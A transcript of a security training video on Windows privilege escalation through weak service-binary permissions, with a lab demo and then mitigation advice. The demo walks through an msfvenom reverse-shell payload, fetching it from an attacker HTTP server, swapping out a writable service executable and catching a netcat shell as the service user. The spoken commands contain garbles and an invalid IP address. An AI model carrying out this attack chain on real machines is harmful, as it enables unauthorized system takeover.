Hey hackers, welcome to Azefox Innovation's new video on insecure service permissions, which is a part of Windows privilege escalation. Right. So in this video, we'll start with the basics of what services are, how they are managed by Windows, and then see how attackers can abuse weak permissions to escalate privileges. So let's get started. So we'll start with the Windows services, right? So Windows services are like background processes that support both the system and applications, right? They can run with or without user interaction, right? Some of the examples of services in Windows is the print spooler, right, which makes sure printers work. Then we have the Windows updates, which keep the system patched, and then we have the antivirus services, which scan for threats even when you are not logged in, right? Yeah. So the service control manager. At the heart of services is something called this SCM, which is also known as service control manager, right? The SCM is actually responsible for managing all Windows services. It can start or stop services, load their configuration from registry, and make sure service dependencies are like respected. Okay. So you can think of the SCM like a traffic controller for all for all the services, right? It decides which services start first and ensures everything run in the right order. Even since it run as the system account, it has complete control over the service operations. The service start types, right? So now services can be started in different ways. Some start automatically at both like critical system services. Others might be set to automatic but with a delay. So once like set with a delay, they slow down the startup process, right? They actually don't slow down the startup process. Then if the services are set to manual, meaning they only run when something specifically triggers them, right? And there's a disabled like which won't run at all, right? So we can control this all using different methods. you know for example, you have the SC, which stands for services, right, in CMD, right? In PowerShell you can use the start service and the stop service CMD let, and we can by for GUI performances or for like doing or changing the configurations, right, for the service statics, we can you also use the services.msc binary. So let me just show you the services.msc, right? It contains all the services that are currently running in the system. As you can see, like some are manual, some are automatic, right? And so some are disabled, as you can see. So this is how services actually looks like. It's kind of behind the scenes, I would say, right? So yeah, and let's go to the next slide. And okay, so yeah, this is what how services are actually controlled, right? We can, as what I said, SC stands for services. We have a service start, then we have a service name, then we have the SC stop and the service, the service name, right? For example, I can open my command prompt here. Then I can just type SC start the service name here, right? It will actually start the service, and I can also use SC stop to stop the service, right? This is like similar to the systemctl command in Linux, right? So the people who have experience with Linux, of course, they might have known what is the systemctl command is, by the way. Okay, and similarly, as we're using SC here in PowerShell, we will be using like start service or stop service CMD, right? Yeah, and so why services matter for security? Why do we care about services from a security perspective? So because services often run with very high privileges, many of them run a system which is the most powerful account in Windows, right? And another important detail is that Windows completely trusts the executables that services are linked to. So if an attacker can tamper, with the service binary, that malicious code will be executed with the service privileges, right? This is why misconfigured permissions around services become a gold mine, for attackers. They can like escalate privilege with minimal, effort or efforts. So now we are into the main thing or the main part, the insecure service permissions, right? So like here, what's the idea or like somewhat like a 101 for the insecure service permissions part, right? you know, then generally, what happens, services run executables in the background, right? So these executables actually, inherit the privileges of the account that the service is running under, right? If that service is like running a system, then executable is essentially system level code, right? So now the permissions on that executables are weak. For example, if normal users have modify or full control, then an attacker on the machine could simply replace the binary with their own payload, so that so that next time the service runs, it executes the attacker's code with high privileges. So that's what the beauty of insecure service permissions, by the way. So now how the attack works, right? So let's walk through this. First, the attacker actually, identifies a service and notes down the executable path. Next they check, the file permissions. If the executable is writable by users or everyone, it's vulnerable, right? Then what happens? The attacker then replaces the service binary with their own malicious payload. Then the service is restarted. Then the control the service control manager, the SCM, launches the payload instead of the original binary once the service gets restarted. And finally the attacker code execution, the attacker gets code execution with privileges of the service account, right? So here is an example scenario. So for example, imagine like there's a service that runs a system, but it is like its executable is stored in a folder where normal users can modify files, right? So it can be a huge mistake, right? As an attacker replaces their that executable with their own malicious program. The next time the service restarts, Windows executes the attacker's program with system privileges. At that point, the attacker has full control of the system. So why insecure service permissions work, or why it works, right? So first, Windows fully trusts the service binary path that's like configured, in the registry, right? Like whatever is there, SCM will launch it. Secondly, like services don't drop privileges; they inherit the exact privileges of the account they are configured to run under. And finally, we have the weak permissions. Finally, weak permissions on binary, open the door for attackers. So like if they can write to that file, they effectively control the Windows executes with system power, right? So now we are, into the demonstration part here, right? So let me open up my Kali machine here. And let me check whether my lab is working. Yeah, it is working, so it's not an issue. So first, here I have a service known as Windows Scheduler. Okay, so let me first query that particular Windows. This particular service, like which is the vulnerable one here, which is kind of configured with insecure service permissions, right? So now what we're doing, we're actually querying this particular service, and we are going to check this the executable kind of associated with this with this service, and let's see that if it is kind of vulnerable to insecure service permissions, right? So let me hit enter. Okay. I guess, yeah. And as you can see, this is what the binary, the wservice.exe, which is actually linked or associated with this particular service, right? And it's like actually okay, it's like the svc user one. First let me check for my first let me check my privileges, okay? And I'm the thm unpriv user. Right now I'm actually going to escalate my privilege to another user, which is like which comes under the svc user part, like that username is svc, right? So yeah, now as we know that this is the path of the binary, we are going to use another binary known as icalcs or icalcs, right? Let me just copy this binary, right? Icalcs, and so what this icalcs, this particular command, this particular binary does, it actually lists out all the ACLs. ACL stands for access control list for the particular binary, right? So access control list are somewhat, you can imagine it as a list where it is like it contains a list of all the permissions for the particular binary, like whom can modify what, so that's what the beauty of icals tool is. You can directly list this, and as you can see, once you saw the output, you will see that there is an option like everyone. So the M here stands for modify, so which means like everyone, even the normal user, can modify the binary here, right? So now what we're going to do here is we are going to create a backup for this wservice.exe, right? Then after that, we are going to create a malicious binary using Metasploit. Then we are going to replace this our malicious binary with the name as wservice.exe. Then we are going to restart the service, and once restarted, we will be able to receive a shell as the privileged user, right? So for this, let me create a malicious file here in my Metasploit here. So the command is msvenom np windows 64, then shell reverse underscore tcp. Then allows as I'm like configured with my my VPN, then I will directly use my VPN address here, IP address here. Then L port as, let's say, 5555, and I have the file as exe service, as with this particular one is a exe based service, right? So, and we have finally the output as let's say rib.exe. Okay, so till that, now what we are going to do here, we are going to move to this particular directory. Let me go to this directory, and let me change we are going to change this particular binary's name to some other thing, right? I'm sorry, wservice.exe to like wservice.exe dot backup, like similar to a backup file, right? And it's moved. Now, like, I guess our file got it's like ready, it's cooked. So now let me just transfer this file to my victim's machine, http.server.ad, right? And like I have the I have the PowerShell running here. So I'm just going to download here wget http to the IP address 10.17.31.444, and the file name as rib.exe, and also the output as rib.exe here. And yeah, so I guess the file got downloaded here, and yeah, then now as we have the file here, we are going to move that file here, the rib.exe, as wservice.exe here, right? So let me copy that file from there to here, right? Cause copy, then and before that, let me turn on let me actually turn on my reverse shell here. So netcat minus nl nlvp 5555 for the port, and then sorry, then just go here and just copy the users, sorry, then thm prev unprev, then I also have like the ref.exe, sorry, ref ref.exe to here. And here I'm just going to move the particular binary. I mean, I'm going to just rename the binary, move the ref.exe to wservice.exe, right? And after this, of course, we need to do some additional operations like using the icals, the icals, the icals binary, icals, then along with the binary, the service.exe. Then we are going to grant the permission as everyone, and like we are going to give it full. Okay, f means full, right? Let me run this, and as you can see, successful processed one file, which means that our the icals actually updated the ACLs of a malicious binary, right? So I hope, yeah, the listener is running here. So let me just now just stop the service here, right? Stop w okay, instead of this we can, it's like Windows scheduler run. Okay, and now if I just start this Windows, I just putting this right, and as you can see, it's starting, and as you can see, we got a shell here. So let me home my, and as you can see, now we are as the user svc user 1, right? So as you can see, we actually escalated our privileges to the user from the normal thm unpriv to the user as svc user 1, right? So this is about the practical demonstration of the insecure service permissions. Now we'll go to the defense part. So yeah, the defense and mitigation part. So how do we prevent this, right? So firstly, like we can restrict the permissions on service executables. Like only administrator and system should have should have the ability to modify the rights. Secondly, monitor for changes to service binaries. Like unexpected changes can be a red flag, right? Third is like audit your environment using tools like access check or ICACLS like ICALS to spot weak permissions, right? And finally, be very cautious with third party software. Like some installers set overly permissive ACLs, which can introduce this kind of vulnerabilities, right? So the conclusion of this video is like services are like critical to Windows, but because like they run with such high privileges, they become a target. Insecure service permissions are like one of the simplest yet most dangerous misconfigurations, right? An attacker doesn't need to exploit just file write access. Just he or she needs a file write access here. So remember, like overwrite, restart, escalate. That's how the attackers see it, right? So yeah, that's all for this video. Um, so make sure you follow and subscribe to Azefox Innovations for more informative videos. We'll catch you all in another new video. Until then, bye.